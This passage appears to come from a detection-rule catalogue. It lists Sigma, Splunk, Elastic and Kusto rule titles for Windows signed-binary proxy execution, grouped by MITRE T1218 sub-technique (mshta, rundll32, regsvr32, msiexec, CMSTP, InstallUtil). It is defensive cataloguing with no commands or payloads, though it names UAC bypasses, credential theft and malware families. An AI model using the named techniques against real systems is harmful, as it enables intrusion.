- Sigma COM Object Execution via Xwizard.EXE test
- Elastic Command and Scripting Interpreter via Windows Scripts production
- Elastic Command Shell Activity Started via RunDLL32 production
- Splunk Control Loading from World Writable Directory production
- Splunk Control Panel Abuse (Sysmon)
- Splunk Control Panel Abuse (Windows Event Log)
- Sigma Control Panel Items test
- Elastic Control Panel Process with Unusual Arguments production
- Splunk Control_RunDLL Call from Command Line (Sysmon)
- Splunk Control_RunDLL Call from Command Line (Windows Event Log)
- Sigma Created Files by Microsoft Sync Center test
- Elastic Creation of SettingContent-ms Files production
- Sigma Csc.EXE Execution Form Potentially Suspicious Parent test
- Sigma Curl Download And Execute Combination test
- Elastic Delayed Execution via Ping production
- Splunk Detect HTML Help Renamed production
- Splunk Detect HTML Help Spawn Child Process production
- Splunk Detect HTML Help URL in Command Line production
- Splunk Detect HTML Help Using InfoTech Storage Handlers production
- Splunk Detect mshta inline hta execution production
- Splunk Detect mshta renamed production
- Splunk Detect MSHTA Url in Command Line production
- Splunk Detect Regasm Spawning a Process production
- Splunk Detect Regasm with Network Connection production
- Splunk Detect Regasm with no Command Line Arguments production
- Splunk Detect Regsvcs Spawning a Process production
- Splunk Detect Regsvcs with Network Connection production
- Splunk Detect Regsvcs with No Command Line Arguments production
- Splunk Detect Regsvr32 Application Control Bypass production
- Splunk Detect Rundll32 Inline HTA Execution production
- Sigma DeviceCredentialDeployment Execution test
- Sigma Devtoolslauncher.exe Executes Specified Binary test
- Sigma Diskshadow Child Process Spawned test
- Sigma Diskshadow Script Mode - Execution From Potential Suspicious Location test
- Sigma Diskshadow Script Mode - Uncommon Script Extension Execution test
- Sigma Diskshadow Script Mode Execution test
- Sigma DLL Call by Ordinal Via Rundll32.EXE stable
- Splunk DLL Called with RS32 (PowerShell)
- Splunk DLL Called with RS32 (Sysmon)
- Splunk DLL Called with RS32 (Windows Event Log)
- Splunk DLL Called with Uncommon Function (PowerShell)
- Splunk DLL Called with Uncommon Function (Sysmon)
- Splunk DLL Called with Uncommon Function (Windows Event Log)
- Splunk DLL Execution from Uncommon Process (PowerShell)
- Splunk DLL Execution from Uncommon Process (Sysmon)
- Splunk DLL Execution from Uncommon Process (Windows Event Log)
- Sigma DLL Execution via Rasautou.exe test
- Sigma DLL Loaded From Suspicious Location Via Cmspt.EXE test
- Sigma DLL Loaded via CertOC.EXE test
- Sigma Dllhost.EXE Initiated Network Connection To Non-Local IP Address test
- Splunk DLLRegisterServer Called from Command Line (PowerShell)
- Splunk DLLRegisterServer Called from Command Line (Sysmon)
- Splunk DLLRegisterServer Called from Command Line (Windows Event Log)
- Sigma DllUnregisterServer Function Call Via Msiexec.EXE test
- Sigma DNS Query Request By Regsvr32.EXE test
- Splunk DNX.exe Proxy Execution (Windows Event Log)
- Splunk Dotnet.exe Execution (Windows Event Log)
- Splunk Driver as Command Parameter (Windows Event Log)
- Sigma Driver/DLL Installation Via Odbcconf.EXE test
- Splunk Dxcap Proxy Execution (Windows Event Log)
- Sigma Equation Group DLL_U Export Function Load stable
- Sigma EvilNum APT Golden Chickens Deployment Via OCX Files test
- Splunk Executable Process from Suspicious Folder (PowerShell)
- Splunk Executable Process from Suspicious Folder (Sysmon)
- Splunk Executable Process from Suspicious Folder (Windows Event Log)
- Sigma Execute Files with Msdeploy.exe test
- Sigma Execute Pcwrun.EXE To Leverage Follina test
- Sigma Execution DLL of Choice Using WAB.EXE test
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution of a Downloaded Windows Script production
- Elastic Execution of COM object via Xwizard production
- Elastic Execution of Persistent Suspicious Program production
- Elastic Execution via Microsoft DotNet ClickOnce Host production
- Sigma Execution via stordiag.exe test
- Elastic Execution via Windows Command Debugging Utility production
- Sigma Execution via WorkFolders.exe test
- Sigma File Download Using ProtocolHandler.exe test
- Sigma File Download Via InstallUtil.EXE test
- Sigma File Download Via Windows Defender MpCmpRun.EXE test
- Elastic File or Directory Deletion Command production
- Elastic File with Suspicious Extension Downloaded production
- Sigma Fireball Archer Install test
- Sigma Gpscript Execution test
- Splunk Group Policy Editor Execution (PowerShell)
- Splunk Group Policy Editor Execution (Sysmon)
- Splunk Group Policy Editor Execution (Windows Event Log)
- Sigma HackTool - CACTUSTORCH Remote Thread Creation test
- Sigma HackTool - F-Secure C3 Load by Rundll32 test
- Sigma HackTool - RedMimicry Winnti Playbook Execution test
- Sigma HH.EXE Execution test
- Splunk hh.exe Execution (PowerShell)
- Splunk hh.exe Execution (Sysmon)
- Splunk hh.exe Execution (Windows Event Log)
- Sigma HH.EXE Initiated HTTP Network Connection test
- Splunk hh.exe Remote File Execution (PowerShell)
- Splunk hh.exe Remote File Execution (Sysmon)
- Splunk hh.exe Remote File Execution (Windows Event Log)
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Sigma IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32 test
- Sigma Ie4uinit Lolbin Use From Invalid Path test
- Splunk IIS Worker (W3WP) Spawn Command Line (Windows Event Log)
- Elastic ImageLoad via Windows Update Auto Update Client production
- Sigma Import LDAP Data Interchange Format File Via Ldifde.EXE test
- Elastic Incoming DCOM Lateral Movement via MSHTA production
- Elastic Incoming DCOM Lateral Movement with MMC production
- Sigma Indirect Command Execution By Program Compatibility Wizard test
- Sigma InfDefaultInstall.exe .inf Execution test
- Sigma Insensitive Subfolder Search Via Findstr.EXE test
- Elastic InstallUtil Activity production
- Elastic InstallUtil Process Making Network Connections production
- Sigma Kapeka Backdoor Execution Via RunDLL32.EXE test
- Sigma Kapeka Backdoor Loaded Via Rundll32.EXE test
- Sigma Legitimate Application Dropped Archive test
- Sigma Legitimate Application Dropped Executable test
- Sigma Legitimate Application Dropped Script test
- Sigma Legitimate Application Writing Files In Uncommon Location experimental
- Splunk LOLBAS With Network Traffic production
- Sigma Lolbin Runexehelper Use As Proxy test
- Sigma Lolbin Unregmp2.exe Use As Proxy test
- Splunk Malicious InProcServer32 Modification production
- Sigma Malicious PE Execution by Microsoft Visual Studio Debugger test
- Sigma Malicious Windows Script Components File Execution by TAEF Detection test
- Splunk Mavinject Execution (EDR)
- Splunk Mavinject Execution (Sysmon)
- Splunk Mavinject Execution (Windows Event Log)
- Sigma Mavinject Inject DLL Into Running Process test
- Elastic Microsoft Management Console File from Unusual Path production
- Sigma Microsoft Sync Center Suspicious Network Connections test
- Sigma Microsoft Workflow Compiler Execution test
- Sigma MMC Executing Files with Reversed Extensions Using RTLO Abuse experimental
- Sigma MMC Loading Script Engines DLLs experimental
- Splunk Mmc LOLBAS Execution Process Spawn production
- Sigma MpiExec Lolbin test
- Sigma MSDT Execution Via Answer File test
- Sigma MSHTA Execution with Suspicious File Extensions test
- Elastic Mshta Making Network Connections production
- Splunk Mshta spawning Rundll32 OR Regsvr32 Process production
- Splunk MSHTA.exe execution (PowerShell)
- Splunk MSHTA.exe execution (Sysmon)
- Splunk MSHTA.exe execution (Windows Event Log)
- Splunk mshta.exe File Download (PowerShell)
- Splunk mshta.exe File Download (Sysmon)
- Splunk mshta.exe File Download (Windows Event Log)
- Sigma MSI Installation From Web test
- Splunk MSI Installation via Appcert (PowerShell)
- Splunk MSI Installation via Appcert (Sysmon)
- Splunk MSI Installation via Appcert (Windows Event Log)
- Splunk Msiexec Abuse (Sysmon)
- Splunk Msiexec Abuse (Windows Event Log)
- Splunk MSIExec Install MSI File (Sysmon)
- Splunk MSIExec Install MSI File (Windows Event Log)
- Sigma Msiexec Quiet Installation test
- Elastic MsiExec Service Child Process With Network Connection production
- Sigma MsiExec Web Install test
- Splunk MSIExec.exe Execution (Sysmon)
- Splunk MSIExec.exe Execution (Windows Event Log)
- Sigma Msiexec.EXE Initiated Network Connection Over HTTP test
- Elastic Network Activity to a Suspicious Top Level Domain production
- Sigma Network Connection Initiated By AddinUtil.EXE test
- Sigma Network Connection Initiated By Regsvr32.EXE test
- Elastic Network Connection via Certutil production
- Elastic Network Connection via Compiled HTML File production
- Elastic Network Connection via Registration Utility production
- Elastic Network Connection via Signed Binary production
- Sigma New Capture Session Launched Via DXCap.EXE test
- Sigma New DLL Registered Via Odbcconf.EXE test
- Sigma New Self Extracting Package Created Via IExpress.EXE test
- Sigma NotPetya Ransomware Activity test
- Splunk Nslookup Execution (Windows Event Log)
- Sigma Obfuscated PowerShell MSI Install via WindowsInstaller COM experimental
- Sigma Odbcconf.EXE Suspicious DLL Location test
- Sigma OneNote.EXE Execution of Malicious Embedded Scripts test
- Sigma OpenWith.exe Executes Specified Binary test
- Sigma Outbound Network Connection Initiated By Cmstp.EXE test
- Sigma Outbound Network Connection To Public IP Via Winlogon test
- Elastic Persistence via a Windows Installer production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential Application Whitelisting Bypass via Dnx.EXE test
- Sigma Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 test
- Sigma Potential Arbitrary File Download Via Cmdl32.EXE test
- Sigma Potential Baby Shark Malware Activity test
- Sigma Potential Binary Impersonating Sysinternals Tools test
- Sigma Potential Binary Proxy Execution Via Cdb.EXE test
- Sigma Potential Binary Proxy Execution Via VSDiagnostics.EXE test
- Sigma Potential Bumblebee Remote Thread Creation test
- Elastic Potential Command and Control via Internet Explorer production
- Sigma Potential Compromised 3CXDesktopApp Execution test
- Sigma Potential Compromised 3CXDesktopApp Update Activity test
- Elastic Potential Credential Access via Renamed COM+ Services DLL production
- Elastic Potential Credential Access via Windows Utilities production
- Elastic Potential CVE-2025-33053 Exploitation production
- Elastic Potential Defense Evasion via CMSTP.exe production
- Sigma Potential Devil Bait Malware Reconnaissance test
- Sigma Potential DLL Sideloading Activity Via ExtExport.EXE test
- Sigma Potential DLL Sideloading Using Coregen.exe test
- Sigma Potential Emotet Rundll32 Execution test
- Sigma Potential EmpireMonkey Activity test
- Elastic Potential Escalation via Vulnerable MSI Repair production
- Elastic Potential Execution via FileFix Phishing Attack production
- Sigma Potential Exploitation of RCE Vulnerability CVE-2025-33053 experimental
- Sigma Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Image Load experimental
- Sigma Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Process Access experimental
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Sigma Potential File Download Via MS-AppInstaller Protocol Handler test
- Elastic Potential File Transfer via Certreq production
- Sigma Potential LethalHTA Technique Execution test
- Elastic Potential Local NTLM Relay via HTTP production
- Sigma Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution test
- Sigma Potential NTLM Coercion Via Certutil.EXE test
- Sigma Potential Password Spraying Attempt Using Dsacls.EXE test
- Sigma Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE test
- Sigma Potential PowerShell Execution Via DLL test
- Elastic Potential Protocol Tunneling via Yuze production
- Sigma Potential Provisioning Registry Key Abuse For Binary Proxy Execution test
- Sigma Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG test
- Sigma Potential Provlaunch.EXE Binary Proxy Execution Abuse test
- Sigma Potential Proxy Execution Via Explorer.EXE From Shell Process test
- Sigma Potential Raspberry Robin CPL Execution Activity test
- Sigma Potential Register_App.Vbs LOLScript Abuse test
- Sigma Potential Regsvr32 Commandline Flag Anomaly test
- Elastic Potential Remote File Execution via MSIEXEC production
- Elastic Potential Remote Install via MsiExec production
- Sigma Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module test
- Sigma Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock test
- Sigma Potential Suspicious Child Process Of 3CXDesktopApp test
- Sigma Potential Suspicious Mofcomp Execution test
- Splunk Potential Sysinternals Tool Execution (PowerShell)
- Splunk Potential Sysinternals Tool Execution (Sysmon)
- Splunk Potential Sysinternals Tool Execution (Windows Event Log)
- Sigma Potentially Over Permissive Permissions Granted Using Dsacls.EXE test
- Sigma Potentially Suspicious Cabinet File Expansion test
- Sigma Potentially Suspicious Child Process Of DiskShadow.EXE test
- Sigma Potentially Suspicious Child Process Of Regsvr32 test
- Sigma Potentially Suspicious Child Process Of VsCode test
- Sigma Potentially Suspicious Child Processes Spawned by ConHost experimental
- Sigma Potentially Suspicious CMD Shell Output Redirect test
- Sigma Potentially Suspicious DLL Registered Via Odbcconf.EXE test
- Sigma Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location test
- Sigma Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension test
- Sigma Potentially Suspicious Regsvr32 HTTP IP Pattern test
- Sigma Potentially Suspicious Regsvr32 HTTP/FTP Pattern test
- Sigma Potentially Suspicious Rundll32 Activity test
- Sigma Potentially Suspicious Rundll32.EXE Execution of UDL File test
- Sigma Potentially Suspicious Self Extraction Directive File Created test
- Sigma Potentially Suspicious Wuauclt Network Connection test
- Sigma PowerShell MSI Install via WindowsInstaller COM From Remote Location experimental
- Sigma PowerShell WMI Win32_Product Install MSI test
- Sigma Process Access via TrolleyExpress Exclusion test
- Elastic Process Activity via Compiled HTML File production
- Splunk Process Creation Using Sysnative Folder (Sysmon)
- Splunk Process Creation Using Sysnative Folder (Windows Event Log)
- Kusto Process Injection Initiated By MMC
- Sigma Process Memory Dump Via Dotnet-Dump test
- Sigma Process Proxy Execution Via Squirrel.EXE test
- Sigma Program Executed Using Proxy/Local Command Via SSH.EXE test
- Sigma Proxy Execution Via Wuauclt.EXE test
- Sigma RegAsm.EXE Execution Without CommandLine Flags or Files experimental
- Sigma RegAsm.EXE Initiating Network Connection To Public IP test
- Sigma REGISTER_APP.VBS Proxy Execution test
- Sigma Regsvr32 DLL Execution With Suspicious File Extension test
- Splunk regsvr32 Execution (PowerShell)
- Splunk regsvr32 Execution (Sysmon)
- Splunk regsvr32 Execution (Windows Event Log)
- Sigma Regsvr32 Execution From Highly Suspicious Location test
- Sigma Regsvr32 Execution From Potential Suspicious Location test
- Splunk regsvr32 Referencing Unusual Paths (Sysmon)
- Splunk regsvr32 Referencing Unusual Paths (Windows Event Log)
- Kusto Regsvr32 Rundll32 Image Loads Abnormal Extension available
- Kusto Regsvr32 Rundll32 with Anomalous Parent Process available
- Splunk Regsvr32 Silent and Install Param Dll Loading production
- Splunk Regsvr32 with Known Silent Switch Cmdline production
- Sigma Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly test
- Splunk Remote .msi Installation (PowerShell)
- Splunk Remote .msi Installation (PowerShell)
- Splunk Remote .msi Installation (Sysmon)
- Splunk Remote .msi Installation (Sysmon)
- Splunk Remote .msi Installation (Windows Event Log)
- Splunk Remote .msi Installation (Windows Event Log)
- Sigma Remote CHM File Download/Execution Via HH.EXE test
- Sigma Remote File Download Via Findstr.EXE test
- Sigma Remote Thread Creation Via PowerShell In Uncommon Target test
- Sigma RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses test
- Sigma Remotely Hosted HTA File Executed Via Mshta.EXE test
- Sigma Renamed Mavinject.EXE Execution test
- Sigma Renamed MegaSync Execution test
- Sigma Renamed ZOHO Dctask64 Execution test
- Sigma Response File Execution Via Odbcconf.EXE test
- Sigma Rhadamanthys Stealer Module Launch Via Rundll32.EXE test
- Splunk RunDLL Loading DLL By Ordinal production
- Splunk Rundll32 Command Line (PowerShell)
- Splunk Rundll32 Command Line (Sysmon)
- Splunk Rundll32 Command Line (Windows Event Log)
- Splunk Rundll32 Control RunDLL Hunt production
- Splunk Rundll32 Control RunDLL World Writable Directory production
- Splunk Rundll32 DNSQuery production
- Sigma Rundll32 Execution With Uncommon DLL Extension test
- Sigma Rundll32 InstallScreenSaver Execution test
- Sigma Rundll32 Internet Connection test
- Splunk Rundll32 LockWorkStation production
- Splunk Rundll32 Process Creating Exe Dll Files production
- Sigma RunDLL32 Spawning Explorer test
- Splunk Rundll32 Suspicious Command Line (PowerShell)
- Splunk Rundll32 Suspicious Command Line (Sysmon)
- Splunk Rundll32 Suspicious Command Line (Windows Event Log)
- Splunk rundll32 Suspicious Parent Process (Sysmon)
- Splunk rundll32 Suspicious Parent Process (Windows Event Log)
- Sigma Rundll32 UNC Path Execution test
- Splunk Rundll32 with no Command Line Arguments with Network production
- Splunk rundll32 with No DLL in Command Line (Sysmon)
- Splunk rundll32 with No DLL in Command Line (Windows Event Log)
- Splunk Rundll32.exe as Parent Process (Sysmon)
- Splunk Rundll32.exe as Parent Process (Windows Event Log)
- Sigma Rundll32.EXE Calling DllRegisterServer Export Function Explicitly test
- Splunk rundll32.exe Executing DLL from Non-standard Directory (PowerShell)
- Splunk rundll32.exe Executing DLL from Non-standard Directory (Sysmon)
- Splunk rundll32.exe Executing DLL from Non-standard Directory (Windows Event Log)
- Sigma Scheduled Task Creation with Curl and PowerShell Execution Combo experimental
- Sigma SCR File Write Event test
- Sigma ScreenSaver Registry Key Set test
- Elastic Script Execution via Microsoft HTML Application production
- Kusto Script Interpreter Loading DotNet Assembly From Memory
- Sigma Scripting/CommandLine Process Spawned Regsvr32 test
- Sigma Sdiagnhost Calling Suspicious Child Process test
- Sigma Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location test
- Sigma Self Extraction Directive File Created In Potentially Suspicious Location test
- Sigma Sensitive File Dump Via Print.EXE test
- Elastic Service Control Spawned via Script Interpreter production
- Splunk Shell Spawned by Web Server - Windows (Windows Event Log)
- Sigma Shell32 DLL Execution in Suspicious Directory test
- Elastic Signed Proxy Execution via MS Work Folders production
- Sigma Sofacy Trojan Loader Activity test
- Elastic Suspicious .NET Code Compilation production
- Sigma Suspicious AddinUtil.EXE CommandLine Execution test
- Sigma Suspicious AgentExecutor PowerShell Execution test
- Sigma Suspicious BitLocker Access Agent Update Utility Execution experimental
- Splunk Suspicious Child Process for hh.exe (Sysmon)
- Splunk Suspicious Child Process for hh.exe (Windows Event Log)
- Splunk Suspicious Child Process for mshta.exe (Sysmon)
- Splunk Suspicious Child Process for mshta.exe (Windows Event Log)
- Sigma Suspicious Child Process Of BgInfo.EXE test
- Sigma Suspicious Control Panel DLL Load test
- Sigma Suspicious Csi.exe Usage test
- Sigma Suspicious DLL Loaded via CertOC.EXE test
- Sigma Suspicious DotNET CLR Usage Log Artifact test
- Sigma Suspicious Driver/DLL Installation Via Odbcconf.EXE test
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Execution from VS Code Extension production
- Splunk Suspicious Execution via Microsoft Common Console (Sysmon)
- Splunk Suspicious Execution via Microsoft Common Console (Windows Event Log)
- Elastic Suspicious Execution via MSIEXEC production
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious HH.EXE Execution test
- Splunk Suspicious IcedID Rundll32 Cmdline production
- Sigma Suspicious JavaScript Execution Via Mshta.EXE test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious Microsoft Diagnostics Wizard Execution production
- Elastic Suspicious Microsoft HTML Application Child Process production
- Sigma Suspicious Microsoft Office Child Process test
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Kusto Suspicious MSC File Launched
- Sigma Suspicious MSDT Parent Process test
- Sigma Suspicious MSHTA Child Process test
- Splunk Suspicious mshta child process production
- Splunk Suspicious mshta spawn production
- Sigma Suspicious MsiExec Embedding Parent test
- Sigma Suspicious Msiexec Execute Arbitrary DLL test
- Sigma Suspicious Msiexec Quiet Install From Remote Location test
- Splunk Suspicious Parent Process for msiexec.exe (Sysmon)
- Splunk Suspicious Parent Process for msiexec.exe (Windows Event Log)
- Elastic Suspicious PDF Reader Child Process production
- Sigma Suspicious Provlaunch.EXE Child Process test
- Splunk Suspicious reCAPTCHA Command Line (PowerShell)
- Splunk Suspicious reCAPTCHA Command Line (Sysmon)
- Sigma Suspicious Regsvr32 Execution From Remote Share test
- Splunk Suspicious Regsvr32 Register Suspicious Path production
- Sigma Suspicious Response File Execution Via Odbcconf.EXE test
- Sigma Suspicious Rundll32 Activity Invoking Sys File test
- Splunk Suspicious Rundll32 dllregisterserver production
- Sigma Suspicious Rundll32 Execution With Image Extension test
- Splunk Suspicious Rundll32 no Command Line Arguments production
- Splunk Suspicious Rundll32 PluginInit production
- Sigma Suspicious Rundll32 Setupapi.dll Activity test
- Splunk Suspicious Rundll32 StartW production
- Elastic Suspicious ScreenConnect Client Child Process production
- Elastic Suspicious Shell Execution via Velociraptor production
- Sigma Suspicious ShellExec_RunDLL Call Via Ordinal test
- Elastic Suspicious SolarWinds Web Help Desk Java Module Load or Child Process production
- Sigma Suspicious Speech Runtime Binary Child Process experimental
- Elastic Suspicious Troubleshooting Pack Cabinet Execution production
- Kusto Suspicious use of CPL file
- Sigma Suspicious Vsls-Agent Command With AgentExtensionPath Load test
- Elastic Suspicious Windows Command Shell Arguments production
- Sigma Suspicious WMIC Execution Via Office Process test
- Elastic Suspicious WMIC XSL Script Execution production
- Sigma Suspicious WmiPrvSE Child Process test
- Sigma Suspicious ZipExec Execution test
- Sigma SyncAppvPublishingServer Bypass Powershell Restriction - PS Module test
- Sigma SyncAppvPublishingServer Execute Arbitrary PowerShell Code test
- Splunk SyncAppvPublishingServer Execution (Windows Event Log)
- Sigma SyncAppvPublishingServer Execution to Bypass Powershell Restriction test
- Sigma SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code test
- Sigma Time Travel Debugging Utility Usage test
- Sigma Time Travel Debugging Utility Usage - Image test
- Elastic UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer production
- Splunk UAC Bypass MMC Load Unsigned Dll production
- Elastic UAC Bypass via Windows Firewall Snap-In Hijack production
- Splunk UAC Bypass With Colorui COM Object production
- Sigma Uncommon Assistive Technology Applications Execution Via AtBroker.EXE test
- Sigma Uncommon AddinUtil.EXE CommandLine Execution test
- Sigma Uncommon Child Process Of AddinUtil.EXE test
- Sigma Uncommon Child Process Of Appvlp.EXE test
- Sigma Uncommon Child Process Of BgInfo.EXE test
- Sigma Uncommon Child Process Of Defaultpack.EXE test
- Sigma Uncommon Child Process Of Setres.EXE test
- Sigma Uncommon Child Process Spawned By Odbcconf.EXE test
- Sigma Uncommon Link.EXE Parent Process test
- Splunk Uninstall App Using MsiExec production
- Sigma Unsigned DLL Loaded by Windows Utility test
- Elastic Unusual Child Processes of RunDLL32 production
- Elastic Unusual Execution via Microsoft Common Console File production
- Elastic Unusual Network Activity from a Windows System Binary production
- Elastic Unusual Network Connection via DllHost production
- Elastic Unusual Network Connection via RunDLL32 production
- Elastic Unusual Process Network Connection production
- Sigma Use of Scriptrunner.exe test
- Sigma Use Of The SFTP.EXE Binary As A LOLBIN test
- Sigma Use of VisualUiaVerifyNative.exe test
- Splunk Verclsid CLSID Execution production
- Sigma Verclsid.exe Runs COM Object test
- Sigma Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution test
- Sigma Visual Studio NodejsTools PressAnyKey Renamed Execution test
- Splunk Wbemprox COM Object Execution production
- Splunk Windows Advanced Installer MSIX with AI_STUBS Execution production
- Splunk Windows Application Whitelisting Bypass Attempt via Rundll32 production
- Splunk Windows Binary Proxy Execution Mavinject DLL Injection production
- Splunk Windows BitLockerToGo Process Execution production
- Splunk Windows BitLockerToGo with Network Activity production
- Splunk Windows Diskshadow Proxy Execution production
- Splunk Windows DotNet Binary in Non Standard Path production
- Splunk Windows Execute Arbitrary Commands with MSDT production
- Splunk Windows Execution of Microsoft MSC File In Suspicious Path production
- Splunk Windows GrimResource - MMC Process Accessing APDS DLL production
- Splunk Windows HTTP Network Communication From MSIExec production
- Elastic Windows Installer with Suspicious Properties production
- Splunk Windows InstallUtil Credential Theft production
- Splunk Windows InstallUtil in Non Standard Path production
- Splunk Windows InstallUtil Remote Network Connection production
- Splunk Windows InstallUtil Uninstall Option production
- Splunk Windows InstallUtil URL in Command Line production
- Splunk Windows IOBit Unlocker Extension DLL Registration via Regsvr32 production
- Splunk Windows LOLBAS Executed As Renamed File production
- Splunk Windows LOLBAS Executed Outside Expected Path production
- Splunk Windows Mock Trusted Directory MSC File Creation production
- Splunk Windows MSC EvilTwin Directory Path Manipulation production
- Splunk Windows Mshta Execution In Registry production
- Splunk Windows MSHTA Writing to World Writable Path production
- Splunk Windows MSI Rollback Script Deleted By Non-Msiexec Process production
- Splunk Windows MSIExec DLLRegisterServer production
- Splunk Windows MsiExec HideWindow Rundll32 Execution production
- Splunk Windows MSIExec Remote Download production
- Splunk Windows MSIExec Spawn Discovery Command production
- Splunk Windows MSIExec Spawn WinDBG production
- Splunk Windows MSIExec Unregister DLLRegisterServer production
- Sigma Windows MSIX Package Support Framework AI_STUBS Execution experimental
- Splunk Windows Odbcconf Hunting production
- Splunk Windows Odbcconf Load DLL production
- Splunk Windows Odbcconf Load Response File production
- Splunk Windows Process Writing File to World Writable Path production
- Splunk Windows Proxy Execution of .NET Utilities via Scripts production
- Splunk Windows Rasautou DLL Execution production
- Splunk Windows Regsvr32 Renamed Binary production
- Splunk Windows Rundll32 Apply User Settings Changes production
- Splunk Windows Rundll32 Load DLL in Temp Dir production
- Splunk Windows Rundll32 with Non-Standard File Extension production
- Elastic Windows Server Update Service Spawning Suspicious Processes production
- Sigma Windows Shell/Scripting Processes Spawning Suspicious Programs test
- Splunk Windows System Binary Proxy Execution Compiled HTML File Decompile production
- Splunk Windows System Script Proxy Execution Syncappvpublishingserver production
- Splunk Windows Unusual Process Load Mozilla NSS-Mozglue Module production
- Sigma Winrs Local Command Execution experimental
- Sigma Wlrmdr.EXE Uncommon Argument Or Child Process experimental
- Sigma WSL Child Process Anomaly test
- Splunk wuauclt.exe Network Connection (Sysmon)
- Splunk wuauclt.exe Network Connection (Windows Event Log)
- Sigma XBAP Execution From Uncommon Locations Via PresentationHost.EXE test
- Sigma ZxShell Malware test
System Binary Proxy Execution: Compiled HTML File T1218.001 22 rules
- Splunk Detect HTML Help Renamed production
- Splunk Detect HTML Help Spawn Child Process production
- Splunk Detect HTML Help URL in Command Line production
- Splunk Detect HTML Help Using InfoTech Storage Handlers production
- Sigma HH.EXE Execution test
- Splunk hh.exe Execution (PowerShell)
- Splunk hh.exe Execution (Sysmon)
- Splunk hh.exe Execution (Windows Event Log)
- Sigma HH.EXE Initiated HTTP Network Connection test
- Splunk hh.exe Remote File Execution (PowerShell)
- Splunk hh.exe Remote File Execution (Sysmon)
- Splunk hh.exe Remote File Execution (Windows Event Log)
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Elastic Network Connection via Compiled HTML File production
- Sigma OneNote.EXE Execution of Malicious Embedded Scripts test
- Elastic Process Activity via Compiled HTML File production
- Sigma Remote CHM File Download/Execution Via HH.EXE test
- Splunk Suspicious Child Process for hh.exe (Sysmon)
- Splunk Suspicious Child Process for hh.exe (Windows Event Log)
- Sigma Suspicious HH.EXE Execution test
- Elastic Suspicious MS Office Child Process production
- Splunk Windows System Binary Proxy Execution Compiled HTML File Decompile production
System Binary Proxy Execution: Control Panel T1218.002 10 rules
- Splunk Control Loading from World Writable Directory production
- Splunk Control Panel Abuse (Sysmon)
- Splunk Control Panel Abuse (Windows Event Log)
- Sigma Control Panel Items test
- Elastic Control Panel Process with Unusual Arguments production
- Splunk Control_RunDLL Call from Command Line (Sysmon)
- Splunk Control_RunDLL Call from Command Line (Windows Event Log)
- Elastic Suspicious MS Office Child Process production
- Kusto Suspicious use of CPL file
- Elastic Unusual Network Activity from a Windows System Binary production
System Binary Proxy Execution: CMSTP T1218.003 23 rules
- Sigma Bypass UAC via CMSTP test
- Splunk CMLUA Or CMSTPLUA UAC Bypass production
- Splunk Cmstp Execution (Sysmon)
- Splunk Cmstp Execution (Windows Event Log)
- Sigma CMSTP Execution Process Access stable
- Sigma CMSTP Execution Process Creation stable
- Sigma CMSTP Execution Registry Event stable
- Sigma CMSTP UAC Bypass via COM Object Access stable
- Elastic Delayed Execution via Ping production
- Sigma DLL Loaded From Suspicious Location Via Cmspt.EXE test
- Elastic Execution from Unusual Directory - Command Line production
- Sigma Outbound Network Connection Initiated By Cmstp.EXE test
- Elastic Potential Defense Evasion via CMSTP.exe production
- Elastic Suspicious .NET Code Compilation production
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Elastic Suspicious PDF Reader Child Process production
- Splunk UAC Bypass With Colorui COM Object production
- Elastic Unusual Network Activity from a Windows System Binary production
- Elastic Unusual Process Network Connection production
- Splunk Wbemprox COM Object Execution production
- Splunk Windows Unusual Process Load Mozilla NSS-Mozglue Module production
System Binary Proxy Execution: InstallUtil T1218.004 16 rules
- Elastic Delayed Execution via Ping production
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution of Persistent Suspicious Program production
- Elastic InstallUtil Activity production
- Elastic InstallUtil Process Making Network Connections production
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Elastic Suspicious PDF Reader Child Process production
- Elastic Unusual Network Activity from a Windows System Binary production
- Splunk Windows DotNet Binary in Non Standard Path production
- Splunk Windows InstallUtil Credential Theft production
- Splunk Windows InstallUtil in Non Standard Path production
- Splunk Windows InstallUtil Remote Network Connection production
- Splunk Windows InstallUtil Uninstall Option production
- Splunk Windows InstallUtil URL in Command Line production
System Binary Proxy Execution: Mshta T1218.005 51 rules
- Elastic Command and Scripting Interpreter via Windows Scripts production
- Sigma Csc.EXE Execution Form Potentially Suspicious Parent test
- Elastic Delayed Execution via Ping production
- Splunk Detect mshta inline hta execution production
- Splunk Detect mshta renamed production
- Splunk Detect MSHTA Url in Command Line production
- Splunk Detect Rundll32 Inline HTA Execution production
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution of a Downloaded Windows Script production
- Elastic Execution of Persistent Suspicious Program production
- Sigma HackTool - CACTUSTORCH Remote Thread Creation test
- Elastic Incoming DCOM Lateral Movement via MSHTA production
- Sigma MSHTA Execution with Suspicious File Extensions test
